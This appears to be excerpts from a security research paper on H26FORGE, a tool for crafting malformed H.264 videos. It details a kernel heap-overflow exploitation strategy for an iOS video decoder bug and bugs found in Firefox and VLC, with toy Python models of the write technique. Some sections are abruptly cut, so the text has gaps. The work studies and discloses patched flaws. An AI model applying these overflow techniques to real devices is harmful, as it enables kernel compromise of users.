The Most Dangerous Codec in The World: Finding and Exploiting Vulnerabilities in H.264 Decoders
only recently moved video parsing into the iOS kernel. Not so. In fact, the first bug we identified was present in the kernel as far back as iOS 10.

YUV, macroblocks, and slices. A video is a collection of pictures or frames made up of pixels. Each pixel is broken down into two components: luma (brightness) and chroma (color). In H.264, luma is denoted as Y and chroma as U and V, where the latter denote the blue-difference and red-difference components, respectively, and are used to recover the green component through a set of linear equations. Together these are called YUV values.

In H.264, frames are split into groups of 16 × 16 pixels called macroblocks. Macroblocks are the core unit used when working with frames. Macroblocks are grouped together into slices, which are used to create frames.

Prediction and deblocking. H.264 compresses videos by relying on prediction techniques to recreate a video at the endpoint. What is sent is the prediction instructions and the residue: the difference between the predicted frame and the actual frame. There are two types of prediction mechanisms in H.264: Intra prediction and Inter prediction.

Intra prediction looks for similarities within the same frame at macroblock granularity. For a macroblock, the decoder takes the edge pixels of neighboring macroblocks and predicts the image using a linear combination of these values. It then adds the residue to the predicted image to get the resulting output image.

Because images are sometimes simply translated across the screen, Inter prediction looks for similarities across frames. Inter-predicted frames copy macroblocks from reference frames and apply residues to construct the final macroblock. The decoder maintains a Decoded Picture Buffer (DPB), and uses it to create a list of reference pictures. Different macroblocks in the same picture can reference different frames in the buffer. If the macroblocks in a frame use only one reference frame, then the frame is referred to as a P frame. If two reference frames are used, then it is referred to as a B frame (for biprediction).

Because frames are reconstructed at the macroblock level, the decoder applies deblocking on the macroblock edges to produce a smoother image.

Profiles and levels. A profile in H.264 signals what features are used to decode the video. Features include the type of entropy encoding and the presence of B frames. The most common profiles are Baseline, Main, and High.

The level of a video signals the possible frame size of the video, how many frames to store in the DPB, and what the maximum possible bit rate should be.

Syntax elements. Video reconstruction instructions are called syntax elements. The possible values each syntax element can be assigned are determined by the semantics of the H.264 syntax elements. The values guide the decoder in choosing prediction variables and recovering residue information.

Syntax elements are grouped together into Network Abstraction Layer Units (NALUs). NALUs have a header signaling the type of content they contain. While the spec allows for up to 32 different types of NALUs, the most common are:
• Sequence Parameter Sets (SPS): these contain the high-level properties of the video, such as profile, level, frame size, cropping, etc. The spec allows for up to 32 SPSes in a video, but only one is active at a time.
• Picture Parameter Sets (PPS): PPSes contain the compression parameters and picture reconstruction instructions. The spec allows for up to 256 PPSes. A PPS must reference a valid SPS in a video.
• Instantaneous Decoder Refresh (IDR) NALUs: IDR NALUs contain slices and force the decoder to clear out its DPB; therefore they should only contain Intra predicted slices (I slices), which do not reference any other frames. The first frame in a video is also expected to be an IDR NALU. An IDR NALU must point to a valid PPS. Slices are split into slice headers with picture information, and slice data with macroblocks that contain the prediction instructions and residue.
• Non-IDR NALUs: Non-IDR NALUs contain slices that can be Intra or Inter predicted, but maintain the decoder state. Single Inter predicted slices (P slices) contain macroblocks that reference a single frame. Bipredicted slices (B slices) can reference two frames. A non-IDR NALU also points to a valid PPS.

Syntax elements may have dependencies that impact how subsequent ones are decoded. Modifying one syntax element changes not only how the picture is produced but also how the stream is read.

Entropy encoding. To compress syntax elements, H.264 entropy encodes them with either stateless or stateful encoding procedures.

Stateless entropy encodings do not rely on neighboring values, and include binary, unary, and exponential-Golomb (exp-Golomb). All SPSes, PPSes, and slice headers are encoded in this stateless manner and are often handled by software.

Stateful entropy encodings rely on previously decoded values and are used within slice data to encode prediction modes and residue values. The two encoding options are Context-Adaptive Variable Length Coding (CAVLC) and Context-Adaptive Binary Arithmetic Coding (CABAC). CAVLC is a run-length encoding, meaning that a value is sent along with the number of times the value consecutively appears. CABAC is an arithmetic encoding in which binary values are recovered from a probability model that adjusts to the current and previous syntax elements. Both CAVLC and CABAC are more resource-intensive than the stateless options and are thus often handled by hardware.

Encoded value organization. Encoded NALUs can be organized in one of two ways: in “Annex B” format, or AVCC format. “Annex B” format [23] denotes the beginning of a NALU with start codes of value 0x00000001 or 0x000001. AVCC format includes the length of each NALU instead of a start code, and is used in MP4 files, with the avcC four-character-code atom containing the SPS and PPS parameters for the video, and the mdat atom containing the slices.
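The two framings, together with the 1-byte NAL unit header at the start of every NALU, can be sketched in a few lines of Python. This is a minimal illustration under simplifying assumptions (well-formed input); the helper names split_annex_b, split_avcc, nal_header, add_emulation_prevention, and remove_emulation_prevention are hypothetical and are not H26FORGE or library APIs. The sketch also covers the emulation-prevention escaping described in the next paragraph, using the spec's rule that 0x03 is inserted only when two zero bytes would be followed by a byte of 0x03 or less; the rare case of a payload ending in 0x00 is ignored.

```python
def split_annex_b(stream: bytes) -> list:
    """Split an Annex B byte stream into NAL units at 0x000001 / 0x00000001 start codes."""
    nalus, start, i = [], None, 0
    while i + 2 < len(stream):
        if stream[i] == 0 and stream[i + 1] == 0 and stream[i + 2] == 1:
            if start is not None:
                nalus.append(stream[start:i])
            i += 3
            start = i
        else:
            i += 1
    if start is not None:
        nalus.append(stream[start:])
    # Drop the extra zero byte of a 4-byte start code (and any trailing_zero_8bits).
    return [nalu.rstrip(b"\x00") for nalu in nalus]


def split_avcc(sample: bytes, length_size: int = 4) -> list:
    """Split an AVCC (MP4) sample into NAL units using big-endian length prefixes.
    length_size comes from the avcC atom (lengthSizeMinusOne + 1)."""
    nalus, i = [], 0
    while i < len(sample):
        if i + length_size > len(sample):
            raise ValueError("truncated NALU length prefix")
        size = int.from_bytes(sample[i:i + length_size], "big")
        i += length_size
        if i + size > len(sample):
            raise ValueError("NALU length runs past the end of the sample")
        nalus.append(sample[i:i + size])
        i += size
    return nalus


def nal_header(nalu: bytes) -> tuple:
    """Return (forbidden_zero_bit, nal_ref_idc, nal_unit_type) from the NALU header byte."""
    b = nalu[0]
    return b >> 7, (b >> 5) & 0x3, b & 0x1F  # 5-bit type field: up to 32 NALU types


def add_emulation_prevention(rbsp: bytes) -> bytes:
    """Insert 0x03 after two zero bytes whenever the next byte is 0x00..0x03."""
    out, zeros = bytearray(), 0
    for byte in rbsp:
        if zeros >= 2 and byte <= 0x03:
            out.append(0x03)
            zeros = 0
        out.append(byte)
        zeros = zeros + 1 if byte == 0 else 0
    return bytes(out)


def remove_emulation_prevention(nalu: bytes) -> bytes:
    """Drop each 0x03 that follows two zero bytes, recovering the raw payload."""
    out, zeros = bytearray(), 0
    for byte in nalu:
        if zeros >= 2 and byte == 0x03:
            zeros = 0
            continue
        out.append(byte)
        zeros = zeros + 1 if byte == 0 else 0
    return bytes(out)
```

For example, a header byte of 0x67 yields nal_unit_type 7 (SPS); type 8 is a PPS, 5 an IDR slice, and 1 a non-IDR slice. Because escaping guarantees that 0x000001 never appears inside a NALU, splitting on start codes is unambiguous.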
Both formats go through a process called emulation prevention, in which sequential 0x00 values within the encoded stream are ‘escaped’ by inserting an emulation-prevention byte, 0x03, after two consecutive 0x00 bytes whenever the following byte is 0x00, 0x01, 0x02, or 0x03. This prevents the decoder from mistaking the sequence for a start code.

H.264 features and extensions. The H.264 specification has a collection of features that are enabled by different profiles. Arbitrary Slice Ordering (ASO) is an error resilience feature that allows frames to be made up of many slices that can arrive at any time. Flexible Macroblock Ordering (FMO) is like ASO, but also allows macroblocks to be arranged in different shapes. Both are part of the Baseline profile.

Since its introduction, the specification has added extensions for new applications and scenarios. Two notable ones are Scalable Video Coding (SVC) and Multiview Video Coding (MVC), which allow for multiple sizes in one encoded video or multiple angles in a single video, respectively.

Decoding pipeline. We now describe how the components are combined to decode a typical H.264 video. First, the decoder is set up by passing in an SPS and a PPS with frame and compression related properties. Then the decoder receives the first slice and parses the slice header syntax elements. The decoder then begins a macroblock-level reconstruction of the image. It entropy decodes the syntax elements and passes them either to a residue reconstruction path or through a frame prediction path with previously decoded frames. Then the predicted frames are combined with the residue, passed through a deblocking engine, and finally stored in the DPB, where the frames can be accessed and presented.

2.2 Software systems that manipulate video

A wide range of software systems handle untrusted video files, providing a broad attack surface for codec bugs.

An important observation is that hardware-assisted video decoding bypasses the careful sandboxing that is otherwise in place to limit the effects of media decoding bugs.

Messengers. Popular messengers will accept video attachments in messages and provide a thumbnail preview notification. In the default configuration of many messengers, the video is processed to produce the thumbnail without user interaction, creating a zero-click attack surface.

There are many examples of video issues on mobile devices. Android has had historical issues in its Stagefright library for processing MP4 files [10, 11]. As we discuss in Section 5, video thumbnailing and decoding constitute exploitable attack surface in Apple’s iMessage application despite the BlastDoor sandbox [18]. Third-party messengers can also be affected. In September, WhatsApp disclosed a critical bug in its parsing of videos on Android and iOS.6

6 CVE-2022-27492, https://www.whatsapp.com/security/advisories/2022/.

Web. Web browsers have long allowed pages to incorporate video to play through the video HTML tag, leading to multiple vulnerabilities in video decoding. For example, both Chrome and Firefox were affected by a 2015 bug in VP9 parsing.7 In Section 6.1 we describe a new vulnerability we found in Firefox’s handling of H.264 files.

7 CVE-2015-1258 and https://crbug.com/450939 for Chrome; CVE-2015-4506 and https://bugzilla.mozilla.org/show_bug.cgi?id=1192226 for Firefox.

Despite this track record, more video processing attack surface is being exposed to the Web platform. Media Source Extensions (MSE) and Encrypted Media Extensions (EME) have been deployed in major browsers; the WebCodecs extension [1], currently only deployed in Chrome, will allow websites direct access to the hardware decoders, completely skipping over container format checks.

Modern browsers carefully sandbox most kinds of media processing libraries, but they call out to system facilities for video decoding. Hardware acceleration is more energy efficient; it allows playback of content that requires a hardware root of trust [38]; and it allows browsers to benefit from the patent licensing fees paid by the hardware suppliers.8

8 For example, Firefox won’t play H.264 videos absent hardware support.

Online platforms. Video transcoding pipelines, such as those at YouTube [40] and Facebook [26], handle user-generated content, which may contain videos that are not spec-compliant. This could lead to denial of service, information leakage from the execution environment or other processed videos, or even code execution.

2.3 Hardware video decoding

Video decoding in modern systems is accelerated with custom hardware. The media IP included in SoCs or GPUs is usually licensed from a third party. In one notable example, iPhone SoCs through the A11 include Imagination Technologies’ D5500 media IP (see Section 5), as do the SoCs in several Android phones we study, with very different kernel drivers layered on top.

OS integration. IP vendors build drivers for their hardware video decoders, which are then called by the OS through its own abstraction layer. The drivers prepare the hardware to receive the encoded buffers, often through shared memory. In this section, we discuss the different OS layers provided to interface with drivers.

While Stagefright is Android’s media engine,9 Android uses OpenMAX (OMX) to communicate with hardware drivers. OMX abstracts the hardware layer from Stagefright, allowing for easier integration of custom hardware video decoders.

9 Online: https://source.android.com/docs/core/media.

Other operating systems similarly have their own abstraction layer. The Linux community has support for video de-
Table 1: Companies that produce hardware video decoders.

[Figure: H26FORGE overview, with stages Inputs → Input Handling → Syntax Manipulation → Output Handling → Outputs.]
offset $b$, is recorded as $A[i] \leftarrow 8(b - i)$. The 257th EPB overwrites $i$ with $8(b_{257} - 256)$, and as a result the 258th EPB stores $8\,(b_{258} - 8(b_{257} - 256))$; NALU length limits keep $b_{258}$ from being more than 8 times $b_{257}$.

17 An H.265 video can have at most 65 RPSes: 64 in the SPS and 1 in a slice header. AppleD5500.kext’s SPS RPS array is length 65 to accommodate this, but it does not impact our analysis.
the context object is freed. By overwriting this pointer with the address of a fake object that itself points to a fake vtable, we can arrange to have any address of our choosing called in place of the legitimate destructor.18

18 Arm Pointer Authentication, which would have prevented us from faking a vtable, was not introduced until the Apple A12 [6], whereas the last Apple SoC to use AppleD5500.kext was the A11.

We did not attempt to develop an end-to-end exploit chain; however, Apple’s assessment was that this bug, like Bug 1, may allow an app “to execute arbitrary code with kernel privileges.”

H26FORGE was crucial in the development of this video: given the lack of byte alignment in exp-Golomb encoded values, hand-tuning this file would be difficult. Updating the video to target new addresses, or to overwrite another object, is straightforward via our video transform.

5.3 Interactive testing

The third way an analyst can use H26FORGE is to interactively test video decoding as part of a complete examination, or even root-cause analysis, of an in-the-wild exploit. For example, CVE-2022-22675 is an out-of-bounds write due to a missing bounds check in AppleAVD.kext affecting iOS versions up to 15.4. Google Project Zero’s write-up of the bug [43] includes a partial proof-of-concept video which does not lead to a crash.

We reverse engineered AppleAVD.kext and used a kernel debugger to test our hypotheses about the bug and its effects. H26FORGE was crucial for producing the video inputs for these debugging sessions.

Notation. When describing SPSes and PPSes, we include the ID in the subscript (e.g., $\mathrm{SPS}_{ID}$, $\mathrm{PPS}_{ID}$). For slices we include the ID of the PPS the slice points to in the subscript and the slice type in a superscript (e.g., $\mathrm{Slice}^{Type}_{PPS\ ID}$).

The CVE-2022-22675 bug. This bug was a missing bounds check for the cpb_count_minus1 syntax element in a function called parseHRD, which recovers the hypothetical reference decoder (HRD) parameters nested within SPS parsing. SPSes can have two different HRD parameters, and their usage and syntax elements are described in Annexes C and E of the H.264 spec [23]. According to the spec, cpb_count_minus1 should have a maximum possible value of 31, but because there is no bounds check and the value is exp-Golomb encoded, we can set it to the maximum value AppleAVD.kext can store: 255. This parameter is used as a loop bound to parse two exp-Golomb encoded uint32 values that are not bounds checked, and an additional single bit. As these are stored in arrays of length 32, when the counter goes past the expected length AppleAVD.kext begins to write into the rest of the SPS object and then past the SPS’s allocated memory. Because of where the second HRD parameters are in the SPS object, this overflow can overwrite at most 832 bytes past the SPS object.

The SPS object is contained in an array of length 32 in an AppleAVD.kext H.264 User Context. The SPS is indexed by its seq_parameter_set_id, with subsequent SPSes with the same ID overwriting previously decoded ones. Immediately after the SPS array is a PPS array of length 256, similarly indexed by pic_parameter_set_id. This means that an overflowing HRD parameter will impact either a neighboring SPS or a PPS, depending on the seq_parameter_set_id. An SPS object is 2224 bytes long and a PPS object is 604 bytes long, so we can either overwrite the first part of a neighboring SPS or completely rewrite the PPS at index 0 along with the start of the PPS at index 1 (up to 832 − 604 = 228 bytes of it).

For the overwrite to have an effect, though, the overflowing HRD parameters must be decoded after the benign SPS or PPS they target; otherwise anything written into the overflowed space is cleared out when the benign SPS or PPS is decoded.

The Project Zero proof-of-concept. Using H26FORGE, we are able to explain why the proof-of-concept video in the Project Zero write-up does not cause a crash. First, the video NALUs are not properly ordered. It starts with an SPS of ID 31 containing the out-of-bounds cpb_count_minus1, a PPS of ID 0, and a slice pointing to PPS 0. As is, the malformed SPS would be decoded before the benign PPS, so any overwritten values would be replaced by the subsequent parsing of the PPS. Second, the PPS points to an SPS of ID 0, but since that does not exist at decoding time, the decoder halts. This proof-of-concept video is quite large, at 20 MB, but we verified by stepping through the Corellium kernel debugger that decoding stops when the first slice cannot find a valid SPS.

An H26FORGE-produced proof-of-concept. We outline the steps necessary to construct a video that induces a controlled kernel heap overflow by overwriting a PPS parameter. Figure 3 shows our overall strategy. More details about our final step are in Appendix A.

Step 1: correct ordering. We use H26FORGE to generate a video with the following NALUs: $\mathrm{SPS}_0$, $\mathrm{PPS}_0$, $\mathrm{SPS}_0$, $\mathrm{Slice}^{I}_{0}$, and $\mathrm{Slice}^{P}_{0}$. The second SPS NALU is where the parseHRD overflow will be placed to corrupt $\mathrm{PPS}_0$.

Step 2: fix the IDs. We create a video transform to adjust parameter IDs. We set the second SPS’s ID to 31 so it will be stored at the end of the SPS array. With H26FORGE we produce both a raw H.264 file and an MP4 video19 with the following order: $\mathrm{SPS}_0$, $\mathrm{PPS}_0$, $\mathrm{SPS}_{31}$, $\mathrm{Slice}^{I}_{0}$, $\mathrm{Slice}^{P}_{0}$.

19 MP4 files contain an avcC atom with all SPSes and PPSes together. MP4 parsers will decode all SPSes, then PPSes, which conflicts with the desired order of events. The MP4 muxer in H26FORGE is modified to only add the first observed SPS and PPS to the avcC atom, and subsequent parameter sets to mdat atoms. Thus, we cannot hit the vulnerable code path by thumbnailing, but may be able to target local privilege escalation. An SPS overwrite may be possible through thumbnailing.
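To show where the unchecked loop bound sits, the following minimal Python sketch parses hrd_parameters() as laid out in Annex E of the H.264 spec, using an exp-Golomb ue(v) reader. It is our own illustration, not AppleAVD.kext’s parseHRD or H26FORGE code, and every name in it (BitReader, BitWriter, parse_hrd, encode_hrd, MAX_CPB) is hypothetical. The 32-entry lists stand in for the fixed-size arrays described above, and the explicit cpb_count_minus1 ≤ 31 check is the one the vulnerable function lacked. The writer also shows why hand-editing such files is hard: ue(255) occupies 17 bits, so every later field shifts by a non-byte amount.

```python
class BitReader:
    """MSB-first reader over an RBSP (emulation-prevention bytes already removed)."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def u(self, n: int) -> int:
        """Read an n-bit unsigned fixed-length field, u(n)."""
        value = 0
        for _ in range(n):
            bit = (self.data[self.pos >> 3] >> (7 - (self.pos & 7))) & 1
            value = (value << 1) | bit
            self.pos += 1
        return value

    def ue(self) -> int:
        """Read an unsigned exp-Golomb value, ue(v): N zeros, a 1, then N suffix bits."""
        zeros = 0
        while self.u(1) == 0:
            zeros += 1
            if zeros > 31:
                raise ValueError("exp-Golomb code too long")
        return (1 << zeros) - 1 + self.u(zeros)


class BitWriter:
    """Test helper that emits u(n) and ue(v) fields; field lengths are not byte-aligned."""

    def __init__(self):
        self.bits = []

    def u(self, n: int, value: int) -> None:
        self.bits += [(value >> (n - 1 - k)) & 1 for k in range(n)]

    def ue(self, value: int) -> None:
        code = value + 1
        self.u(code.bit_length() - 1, 0)  # leading zeros
        self.u(code.bit_length(), code)   # a 1 followed by the suffix bits

    def to_bytes(self) -> bytes:
        bits = self.bits + [1] + [0] * (-(len(self.bits) + 1) % 8)  # stop bit + alignment
        return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))


MAX_CPB = 32  # cpb_count_minus1 must be in 0..31, so at most 32 entries per array


def parse_hrd(r: BitReader) -> dict:
    """Parse hrd_parameters() (H.264 Annex E), rejecting out-of-range cpb_count_minus1."""
    cpb_count_minus1 = r.ue()
    if cpb_count_minus1 >= MAX_CPB:
        # The check missing from the vulnerable parseHRD: without it, the loop below
        # would index past the 32-entry arrays (silent overflow in C, IndexError here).
        raise ValueError(f"cpb_count_minus1 = {cpb_count_minus1} exceeds 31")
    hrd = {"cpb_count_minus1": cpb_count_minus1,
           "bit_rate_scale": r.u(4), "cpb_size_scale": r.u(4),
           "bit_rate_value_minus1": [0] * MAX_CPB,
           "cpb_size_value_minus1": [0] * MAX_CPB,
           "cbr_flag": [0] * MAX_CPB}
    for i in range(cpb_count_minus1 + 1):
        hrd["bit_rate_value_minus1"][i] = r.ue()
        hrd["cpb_size_value_minus1"][i] = r.ue()
        hrd["cbr_flag"][i] = r.u(1)
    for name in ("initial_cpb_removal_delay_length_minus1", "cpb_removal_delay_length_minus1",
                 "dpb_output_delay_length_minus1", "time_offset_length"):
        hrd[name] = r.u(5)
    return hrd


def encode_hrd(cpb_count_minus1: int, bit_rate: int = 1000, cpb_size: int = 2000) -> bytes:
    """Build a test hrd_parameters() payload with the given (possibly invalid) loop count."""
    w = BitWriter()
    w.ue(cpb_count_minus1)
    w.u(4, 0)  # bit_rate_scale
    w.u(4, 0)  # cpb_size_scale
    for _ in range(cpb_count_minus1 + 1):
        w.ue(bit_rate)
        w.ue(cpb_size)
        w.u(1, 1)  # cbr_flag
    for _ in range(4):
        w.u(5, 23)  # the four 5-bit length fields
    return w.to_bytes()
```

With the check in place, parse_hrd(BitReader(encode_hrd(255))) raises ValueError instead of walking 256 entries into 32-entry arrays.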
[Figure 3 diagram: the H.264 bitstream (left) and the H.264 User Context in memory (right), showing the SPS array (IDs 0 to 31), the PPS array (IDs 0 to 255), and slice state at stages (1) to (5), with the parseHRD and parsePredWeightTable writes, the write direction, and the values $B_n$ down to $B_1$.]

Figure 3: Exploiting CVE-2022-22675. The left-hand side shows the correctly ordered H.264 bitstream, read from top to bottom, and the right-hand side shows the decoded contents in memory as they are filled in. (1) The initial SPS and PPS parameters are read, each with ID 0 ($\mathrm{SPS}_0$, $\mathrm{PPS}_0$). (2) An SPS with ID 31 is parsed, where we use an out-of-bounds cpb_count_minus1 in parseHRD to overwrite $\mathrm{PPS}_0$. (3) $\mathrm{PPS}_0$ is overwritten with an out-of-bounds num_ref_idx_l0_active_minus1, used in slice decoding. (4) The overwritten num_ref_idx_l0_active_minus1 causes a second overflow in parsePredWeightTable, writing a 16-bit value $B_n$ greater than 255 at a controlled offset away, with intermediate memory set to a default value. (5) Arbitrary-length values can be written by adjusting the offset in each subsequent slice, writing the values backwards.

Step 3: add the overwrite. With our video that contains the IDs in the correct order, we can now change the syntax elements of $\mathrm{SPS}_{31}$ to trigger CVE-2022-22675. Parts (1) and (2) of Figure 3 illustrate the ordering and this overflow. The HRD parameters are part of an optional syntax element nested inside an SPS. We first use a video transform to ensure that the parameters will be parsed, then we set cpb_count_minus1 to 255. To understand how the syntax elements in the loop are used during the overwrite, we set both exp-Golomb encoded values to a noticeable pattern, and all the byte-sized flag values to true. We now have a video with the following order: $\mathrm{SPS}_0$, $\mathrm{PPS}_0$, $\mathrm{SPS}^{*}_{31}$, $\mathrm{Slice}^{I}_{0}$, $\mathrm{Slice}^{P}_{0}$, where $\mathrm{SPS}^{*}_{31}$ contains the overwrite.

Step 4: control the overwrite location, and produce a second overflow. Setting a breakpoint at slice header decoding in the iOS kernel debugger while playing the video from the previous step allows us to inspect memory and identify write targets in the PPS. We describe an exploit strategy that uses the capability described so far to overwrite the num_ref_idx_l0_active_minus1 PPS parameter.

This parameter is used as a loop bound in prediction weight table syntax parsing, parsePredWeightTable, in which certain 16-bit values are copied from the bitstream to an array member variable in the H.264 User Context object. According to the spec, num_ref_idx_l0_active_minus1 should be at most 31, a limit that AppleAVD.kext correctly checks when parsing PPS parameters. By overwriting this parameter with larger values using the first-stage overflow, we can exceed its limit and cause the parsePredWeightTable loop to write past the end of the array allocated for it within the H.264 User Context object, triggering a second overflow. This is depicted in part (3) of Figure 3.

In a video transform, we set cpb_count_minus1 so that the loop stops at the position where it writes num_ref_idx_l0_active_minus1, and use one of the exp-Golomb encoded HRD parameters to set that field to its maximum value of 255.

Step 5: satisfy constraints and enable the second overflow. Arranging for the first overflow to overwrite num_ref_idx_l0_active_minus1 with a larger value is not enough. We must make sure that other PPS parameters we overflow take on reasonable values to avoid an early exit from video decoding because of a failed AppleAVD.kext check. We must also make sure that slice headers that refer to the PPS parameters we overwrite are Inter predicted and do not have num_ref_idx_active_override_flag set; otherwise prediction weight table syntax parsing is skipped. Finally, we must fill in the slice headers with enough prediction weight table parameters to account for the overwritten loop bound, not the original maximum of 31.

With these additional constraints satisfied, we can trigger a kernel panic due to an out-of-bounds write past the allocated memory of the H.264 User Context.

Step 6: controlling the second overflow. Unfortunately, the crashing video is not immediately useful for heap corruption, for two reasons. First, the overwrite we trigger is so large that it overflows not only the User Context but also the kernel heap as a whole, because the loop bound is derived by sign-extending the num_ref_idx_l0_active_minus1 parameter from 8 bits to 32. Second, the 16-bit values the loop writes to the heap are badly constrained: each must be between 0 and 255 or the loop stops after writing it.

These two problems neatly solve each other. By arranging for the bitstream to include a larger-than-255 value when we have written enough, we can get the loop to exit early despite the huge loop bound. The 16-bit values before the last one must still be between 0 and 255. Part (4) of Figure 3 shows this arrangement, with the last value written denoted $B_n$.
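The interplay in Step 6 and in parts (4) and (5) of the Figure 3 caption can be captured in a toy Python model. Everything here is hypothetical: a list stands in for kernel heap memory, and pred_weight_loop models only the two properties stated above (a loop bound obtained by sign-extending an 8-bit field, and an exit right after the first 16-bit value outside 0 to 255), not the real parsePredWeightTable. In this simplified model each payload entry must itself fall outside 0 to 255, because it is the value that ends its slice’s loop; Appendix A describes how the actual bitstream is arranged.

```python
def sign_extend_8_to_32(value: int) -> int:
    """Sign-extend an 8-bit field to 32 bits, returned as an unsigned integer."""
    value &= 0xFF
    return value | 0xFFFFFF00 if value & 0x80 else value


def pred_weight_loop(heap: list, start: int, loop_bound: int, values: list) -> int:
    """Toy model of the overflowing loop: copy 16-bit values to heap[start + i],
    stopping right after the first value outside 0..255. Returns the count written."""
    written = 0
    for i, value in zip(range(loop_bound), values):
        heap[start + i] = value & 0xFFFF
        written += 1
        if not 0 <= value <= 255:
            break  # early exit despite the huge sign-extended bound
    return written


def write_payload(heap: list, start: int, offset: int, payload: list, filler: int = 0) -> None:
    """Write payload at heap[start + offset:], one slice per entry, last entry first."""
    if not 0 <= filler <= 255 or any(0 <= v <= 255 for v in payload):
        raise ValueError("filler must be in 0..255; payload entries must not be")
    bound = sign_extend_8_to_32(255)  # overwritten num_ref_idx_l0_active_minus1
    for k in reversed(range(len(payload))):
        # Each slice writes in-range filler up to its target, then payload[k] ends the loop,
        # so it stops short of the entries written by earlier slices.
        pred_weight_loop(heap, start, bound, [filler] * (offset + k) + [payload[k]])
```

Writing the entries last-to-first is what keeps each later, shorter slice from clobbering the values placed by earlier ones; the filler corresponds to the “intermediate memory set to a default value” in the caption.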
If we include further slices that reference the PPS parameters we overflowed, we can cause the overflowing loop to execute again, copying a different part of the bitstream into the same User Context object. By working backwards, with each slice writing fewer bytes than the ones before, we avoid undoing the work done earlier in the exploit. This technique is illustrated in part (5) of Figure 3. The first slice writes the out-of-bounds value $B_n$ and stops; the second writes $B_{n-1}$ and stops; and so on, until after $k$ slices we have written $2k$ arbitrary bytes at an arbitrary offset from the User Context object. We provide more details on how we arrange the bitstream in Appendix A.

Exploitation. We have used H26FORGE to automate the creation of a video that uses the described exploit strategy to write an attacker-chosen payload at an attacker-chosen offset from the H.264 User Context object in the iOS kernel heap. As with our Bug 3 from Section 5.2, leveraging this heap-overflow primitive into arbitrary kernel execution is likely to require heap grooming and a kernel address disclosure bug, with the presence of pointer authentication in SoCs that use AppleAVD compounding the challenge. A recent presentation by Tarakanov and Labunets discusses these challenges and proposes some AppleAVD exploitation strategies [45].

6 More H26FORGE Findings

We describe more issues discovered by using H26FORGE as a grammar-aware fuzzer and to generate proof-of-concept videos. We start by showing that heavily fuzzed desktop software, such as Firefox and VLC, can have vulnerabilities unearthed through our technique of producing H.264 videos with unexpected syntax element values. Then, we describe issues that primarily affect hardware video decoding, such as fingerprinting and vulnerable implementations.

6.1 Firefox crash and information leak

We tested generated videos on Firefox 100 as described in Section 5.1, and discovered an out-of-bounds read that causes a crash of the Firefox GPU utility process and a user-visible information leak. The issue arises from conflicting frame sizes provided in the MP4 container as well as multiple SPSes across video playback. Note that both the crash and the information leak are caused by a single video. To exploit this vulnerability, an attacker has to get the victim to visit a website on a vulnerable Firefox browser. We reported this finding to Mozilla, and it has been assigned CVE-2022-3266 and patched in version 105 [33].

Since Firefox cannot play raw H.264 files, we mux our generated videos into an MP4 file. The MP4 file contains frame width and height metadata, but this information does not need to match the encoded data. For every MP4 video we created, we set the width and height to a small constant, regardless of the actual encoded frame size. Firefox relied on this MP4 metadata to create video frames, but because the encoded frame size was larger than expected, we were able to trigger a buffer overflow in the GPU utility process. This was patched by changing the utility process to rely on the returned frame parameters rather than the stored metadata.

Due to the GPU utility process crashing, Firefox fell back to decoding the video in software. From the provided analysis, the Firefox software decoder took frame size parameters from only the first SPS and did not adjust to SPS changes. Thus, because our encoded video has an initial SPS with frame size parameters bigger than those of the second SPS, Firefox was unable to fill up the frame contents of slices after the SPS change, and we were able to read the contents of memory. Figure 4 shows what the user saw. Firefox patched this by adding code to use the correct SPS when determining the frame size.

H26FORGE can set the width and height of an MP4 to either the actual frame size, a random value, or a user-specified value, without having to worry about MP4 atoms. It can also generate videos with multiple SPSes. By adjusting the SPS frame size parameters with a video transform, H26FORGE can control how much information is read out.

6.2 VLC use-after-free

On VLC for Windows version 3.0.17, we discovered a use-after-free vulnerability in FFmpeg’s libavcodec that arises when interacting with Microsoft Direct3D11 Video APIs. We found this by testing generated videos in VLC. The bug is triggered when an SPS change in the middle of the video forces a hardware re-initialization in libavcodec. If exploited, an attacker could gain arbitrary code execution with VLC privileges. We reported this issue to VLC and FFmpeg, and they have fixed it in VLC version 3.0.18 and FFmpeg commit cc867f2.20

20 Online: https://github.com/FFmpeg/FFmpeg/commit/cc867f2c09d2b69cee8a0eccd62aff002cbbfe11.

The use-after-free comes from libavcodec’s multithreaded handling of hardware contexts. VLC creates a libavcodec context and sends each NALU to this context for processing. Libavcodec assigns each NALU to a thread, which interacts with the hardware context to decode a frame. When a libavcodec thread encounters a new SPS, it frees the old hardware context and re-initializes a new one with the new SPS parameters. It then sends the updated hardware context to the other threads for synchronization.

Unfortunately, libavcodec failed to update the main thread with this new context, so when the video finishes and VLC tries to close the libavcodec context, the stale hardware context address is freed again. Before freeing the address, libavcodec checks the data at the address to determine whether to call a virtual destructor. It is possible that an attacker-groomed heap may lead to a use-after-free and code execution as the VLC process.
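The stale-handle pattern behind this use-after-free can be illustrated with a toy Python model. It is not FFmpeg or VLC code: the class names ToyAllocator and ToyDecoder are hypothetical, the Direct3D11 hardware context is reduced to an integer handle, and worker threads are just slots in a list. The allocator raises on a second free of the same handle, which is the point where the real bug would instead read freed memory to decide whether to call a virtual destructor.

```python
class ToyAllocator:
    """Tracks live allocations so that a second free of the same handle is detected."""

    def __init__(self):
        self.live = set()
        self.next_handle = 1

    def alloc(self) -> int:
        handle = self.next_handle
        self.next_handle += 1
        self.live.add(handle)
        return handle

    def free(self, handle: int) -> None:
        if handle not in self.live:
            raise RuntimeError(f"double free / use-after-free of handle {handle}")
        self.live.remove(handle)


class ToyDecoder:
    """Hypothetical model: a main-thread copy plus per-worker copies of one hw-context handle."""

    def __init__(self, heap: ToyAllocator, workers: int, sync_main: bool):
        self.heap = heap
        self.main_hw_ctx = heap.alloc()
        self.worker_hw_ctx = [self.main_hw_ctx] * workers
        self.sync_main = sync_main

    def on_new_sps(self, worker: int) -> None:
        self.heap.free(self.worker_hw_ctx[worker])  # free the old hardware context
        new = self.heap.alloc()                     # re-initialize for the new SPS
        self.worker_hw_ctx = [new] * len(self.worker_hw_ctx)  # sync the other threads
        if self.sync_main:
            self.main_hw_ctx = new                  # the update the buggy version skipped

    def close(self) -> None:
        self.heap.free(self.main_hw_ctx)            # stale handle if main was never synced
```

Running one mid-stream SPS change with sync_main=False and then calling close() reproduces the double free of the original handle; with sync_main=True the same sequence frees each handle exactly once.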
Figure 5: Luma Chroma Thief. On the left, we vertically
Intra predict at the top-most row of macroblocks. On the
right, we horizontally Intra predict at the left-most column of
macroblocks.
